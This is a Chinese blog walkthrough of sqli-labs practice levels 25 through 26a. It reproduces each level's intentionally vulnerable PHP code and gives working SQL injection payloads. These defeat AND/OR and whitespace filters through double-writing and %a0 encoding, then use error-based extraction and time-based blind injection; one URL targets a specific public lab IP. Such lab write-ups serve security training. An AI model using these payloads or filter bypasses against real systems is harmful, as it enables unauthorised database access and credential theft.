sqli-labs Less 25-sqli-labs Less 26a

  1. 前言
  2. 正文
  3. 总结

前言

从sqli-labs25关撸到了26a,这机关撸的我心态爆炸。真的恐怖如斯斗气化马
6Yc87k158En6.jpg

正文

fofa找的练习环境:SQL Injections
windows环境和Linux有不同的方法,由于有些可以代替空格的url编码在windows的Apache不启作用。这里我用Linux做环境,当然你也可以去fofa找在线的。

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>Less-25 Trick with OR & AND</title>
</head>

<body bgcolor="#000000">
<div style=" margin-top:70px;color:#FFF; font-size:40px; text-align:center">Welcome&nbsp;&nbsp;&nbsp;<font color="#FF0000"> Dhakkan </font><br>
<font size="3" color="#FFFF00">


<?php
//including the Mysql connect parameters.
include("../sql-connections/sql-connect.php");


// take the variables 
if(isset($_GET['id']))
{
    $id=$_GET['id'];
    //logging the connection parameters to a file for analysis.
    $fp=fopen('result.txt','a');
    fwrite($fp,'ID:'.$id."\n");
    fclose($fp);

    //fiddling with comments
    $id= blacklist($id); /*黑名单里面过滤了and和or*/
    //echo "<br>";
    //echo $id;
    //echo "<br>";
    $hint=$id;

// connectivity 
    $sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
    $result=mysql_query($sql);
    $row = mysql_fetch_array($result);
    if($row)
    {
          echo "<font size='5' color= '#99FF00'>";    
          echo 'Your Login name:'. $row['username'];
          echo "<br>";
          echo 'Your Password:' .$row['password'];
          echo "</font>";
      }
    else 
    {
        echo '<font color= "#FFFF00">';
        print_r(mysql_error());
        echo "</font>";  
    }
}
else 
{ 
    echo "Please input the ID as parameter with numeric value";
}


function blacklist($id)
{
    $id= preg_replace('/or/i',"", $id);            //strip out OR (non case sensitive)
    $id= preg_replace('/AND/i',"", $id);        //Strip out AND (non case sensitive)

    return $id;
}




?>
</font> </div></br></br></br><center>
<img src="../images/Less-25.jpg" />
</br>
</br>
</br>
<img src="../images/Less-25-1.jpg" />
</br>
</br>
<font size='4' color= "#33FFFF">
<?php
echo "Hint: Your Input is Filtered with following result: ".$hint;
?>
</font> 
</center>
</body>
</html>

从审计第25关的代码可以看到,过滤了and和or,但是正则只对and和or替换为空。只要把过滤的进行双写即可绕过过滤。
(只要想办法被他过滤后还能拼接出被过滤的词就ok了)

第25关

anandd oorr

kevJAg.md.png

实际测试

‘ anandd 1=1 --+

kevwj0.png

报错注入

' anandd updatexml(1,concat(0x7e,(select user()),0x7e),1) --+

kevR3R.md.png

这里要注意一点:

注入的时候information里面的or记得双写,我纠结了半天。。我以为我打错了。。我丢

第25a关
审计代码先

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>Less-25a Trick with OR & AND Blind</title>
</head>

<body bgcolor="#000000">
<div style=" margin-top:60px;color:#FFF; font-size:23px; text-align:center">Welcome&nbsp;&nbsp;&nbsp;<font color="#FF0000"> Dhakkan </font><br>
<font size="3" color="#FFFF00">


<?php
//including the Mysql connect parameters.
include("../sql-connections/sql-connect.php");


// take the variables
if(isset($_GET['id']))
{
$id=$_GET['id'];
//logging the connection parameters to a file for analysis.
$fp=fopen('result.txt','a');
fwrite($fp,'ID:'.$id."\n");
fclose($fp);

    //fiddling with comments
    $id= blacklist($id); /*过滤不变*/
    //echo "<br>";
    //echo $id;
    //echo "<br>";
    $hint=$id;

// connectivity 
$sql="SELECT * FROM users WHERE id=$id LIMIT 0,1";  /*查询方式变了*/
$result=mysql_query($sql);
$row = mysql_fetch_array($result);

    if($row)
    {
          echo "<font size='5' color= '#99FF00'>";    
          echo 'Your Login name:'. $row['username'];
        //echo 'YOU ARE IN ........';          
        echo "<br>";
          echo 'Your Password:' .$row['password'];
          echo "</font>";
      }
    else 
    {
        echo '<font size="5" color="#FFFF00">';
        //echo 'You are in...........';
        //print_r(mysql_error()); /*关闭了输入mysql的报错*/
        //echo "You have an error in your SQL syntax";
        echo "</br></font>";    
        echo '<font color= "#0000ff" font size= 3>';    

    }
}
    else 
{ 
    echo "Please input the ID as parameter with numeric value";
}

function blacklist($id)
{
    $id= preg_replace('/or/i',"", $id);            //strip out OR (non case sensitive)
    $id= preg_replace('/AND/i',"", $id);        //Strip out AND (non case sensitive)

    return $id;
}



?>

</font> </div></br></br></br><center>
<img src="../images/Less-25a.jpg" />
</br>
</br>
</br>
<img src="../images/Less-25a-1.jpg" />
</br>
</br>
<font size='4' color= "#33FFFF">
<?php
echo "Hint: Your Input is Filtered with following result: ".$hint;
?>
</font> 
</center>
</body>
</html>

由于25a把输出mysql错误的语句关闭了,所以我们只能盲注了

%20anandd%20sleep(if((length(database())=8),1,4))

kexfiQ.md.png

第26关
审计代码

 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>Less-26 Trick with comments</title>
</head>

<body bgcolor="#000000">
<div style=" margin-top:70px;color:#FFF; font-size:40px; text-align:center">Welcome&nbsp;&nbsp;&nbsp;<font color="#FF0000"> Dhakkan </font><br>
<font size="3" color="#FFFF00">


<?php
//including the Mysql connect parameters.
include("../sql-connections/sql-connect.php");

// take the variables 
if(isset($_GET['id'])) /*判断GET请求变量ID是否存在*/
{
    $id=$_GET['id'];
    //logging the connection parameters to a file for analysis.
    $fp=fopen('result.txt','a');
    fwrite($fp,'ID:'.$id."\n"); /*写入日志*/
    fclose($fp);

    //fiddling with comments
    $id= blacklist($id); /*黑名单替换,返回的id*/
    //echo "<br>";
    //echo $id;
    //echo "<br>";
    $hint=$id;

// connectivity 
    $sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
    $result=mysql_query($sql);
    $row = mysql_fetch_array($result);
    if($row)
    {
          echo "<font size='5' color= '#99FF00'>";    
          echo 'Your Login name:'. $row['username'];
          echo "<br>";
          echo 'Your Password:' .$row['password'];
          echo "</font>";
      }
    else 
    {
        echo '<font color= "#FFFF00">';
        print_r(mysql_error());
        echo "</font>";  
    }
}
    else { echo "Please input the ID as parameter with numeric value";}




function blacklist($id)
{
    $id= preg_replace('/or/i',"", $id);            //strip out OR (non case sensitive)
    $id= preg_replace('/and/i',"", $id);        //Strip out AND (non case sensitive)
    $id= preg_replace('/[\/\*]/',"", $id);        //strip out /*
    $id= preg_replace('/[--]/',"", $id);        //Strip out --
    $id= preg_replace('/[#]/',"", $id);            //Strip out #
    $id= preg_replace('/[\s]/',"", $id);        //Strip out spaces
    $id= preg_replace('/[\/\\\\]/',"", $id);        //Strip out slashes
    return $id;
}



?>
</font> </div></br></br></br><center>
<img src="../images/Less-26.jpg" />
</br>
</br>
</br>
<img src="../images/Less-26-1.jpg" />
</br>
</br>
<font size='4' color= "#33FFFF">
<?php
echo "Hint: Your Input is Filtered with following result: ".$hint;
?>
</font> 
</center>
</body>
</html>

可以看到很这里过滤的很严格,and,or,/,/*,/s,#,– 全给你过滤掉了
代替空格的办法有很多,这里我用%a0代替。代替空格的方法自行google,至于过滤了and和or一样双写带走,然后闭合就手动闭合。

'%a0anandd%a01=1%a0anandd%a0'1'='1

kezFoD.md.png

那么报错注入,常规操作

'%a0anandd%a0updatexml(1,concat(0x7e,(select%a0user()),0x7e),1)%a0anandd%a0'1'='1

kezQw8.md.png

第26a关
这关就更加恶心了,闭合简直能tm上天

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>Less-26a Trick with comments</title>
</head>

<body bgcolor="#000000">
<div style=" margin-top:70px;color:#FFF; font-size:40px; text-align:center">Welcome&nbsp;&nbsp;&nbsp;<font color="#FF0000"> Dhakkan </font><br>
<font size="3" color="#FFFF00">


<?php
//including the Mysql connect parameters.
include("../sql-connections/sql-connect.php");

// take the variables 
if(isset($_GET['id']))
{
    $id=$_GET['id'];
    //logging the connection parameters to a file for analysis.
    $fp=fopen('result.txt','a');
    fwrite($fp,'ID:'.$id."\n");
    fclose($fp);

    //fiddling with comments
    $id= blacklist($id);
    //echo "<br>";
    //echo $id;
    //echo "<br>";
    $hint=$id;

// connectivity 
    $sql="SELECT * FROM users WHERE id=('$id') LIMIT 0,1"; /*查询方式变了*/
    $result=mysql_query($sql);
    $row = mysql_fetch_array($result);
    if($row)
    {
          echo "<font size='5' color= '#99FF00'>";    
          echo 'Your Login name:'. $row['username'];
          echo "<br>";
          echo 'Your Password:' .$row['password'];
          echo "</font>";
      }
    else 
    {
        echo '<font color= "#FFFF00">';
        //print_r(mysql_error()); /*报错输出注释了*/
        echo "</font>";  
    }
}
    else { echo "Please input the ID as parameter with numeric value";}




function blacklist($id)
{
    $id= preg_replace('/or/i',"", $id);            //strip out OR (non case sensitive)
    $id= preg_replace('/and/i',"", $id);        //Strip out AND (non case sensitive)
    $id= preg_replace('/[\/\*]/',"", $id);        //strip out /*
    $id= preg_replace('/[--]/',"", $id);        //Strip out --
    $id= preg_replace('/[#]/',"", $id);            //Strip out #
    $id= preg_replace('/[\s]/',"", $id);        //Strip out spaces
    $id= preg_replace('/[\s]/',"", $id);        //Strip out spaces
    $id= preg_replace('/[\/\\\\]/',"", $id);        //Strip out slashes
    return $id;
}



?>
</font> </div></br></br></br><center>
<img src="../images/Less-26-a.jpg" />
</br>
</br>
</br>
<img src="../images/Less-26a-1.jpg" />
</br>
</br>
<font size='4' color= "#33FFFF">
<?php
echo "Hint: Your Input is Filtered with following result: ".$hint;
?>
</font> 
</center>
</body>
</html>

闭合很恶心好吧,过滤不变要求我们盲注

%27)%a0anandd%a0sleep(if((1=1),1,4))%a0anandd%a0(%271%27)=(%271

kmSkn0.md.png
跑列名

http://118.24.125.87:8000/Less-26a/?id=1%27)%a0anandd%a0sleep(if((3=(select%a0count(column_name)%a0from%a0infoorrmation_schema.columns%a0where%a0table_name=%22users%22)),1,4))%a0anandd%a0(%271%27)=(%271

kmSJAO.md.png

总结

当我们现实遇见有过滤有waf的时候可以尝试这么一波

1.先判断他过滤了那个词
2.能不能用双写绕过?
3.能不能用对应词语代替?
4.空格过滤了?使用环境能够解析的对应的url编码
5.万物皆可fuzz

fuzz空格得到那个url编码可用:Sqli-Labs:Less 26 - Less 26a - 简书
转载请声明:转自422926799.github.io


转载请注明来源,欢迎对文章中的引用来源进行考证,欢迎指出任何有错误或不够清晰的表达。

文章标题:sqli-labs Less 25-sqli-labs Less 26a

本文作者:九世

发布时间:2019-01-25, 09:58:59

最后更新:2019-04-19, 20:36:16

原始链接:http://422926799.github.io/posts/3c935757.html

版权声明: "署名-非商用-相同方式共享 4.0" 转载请保留原文链接及作者。

目录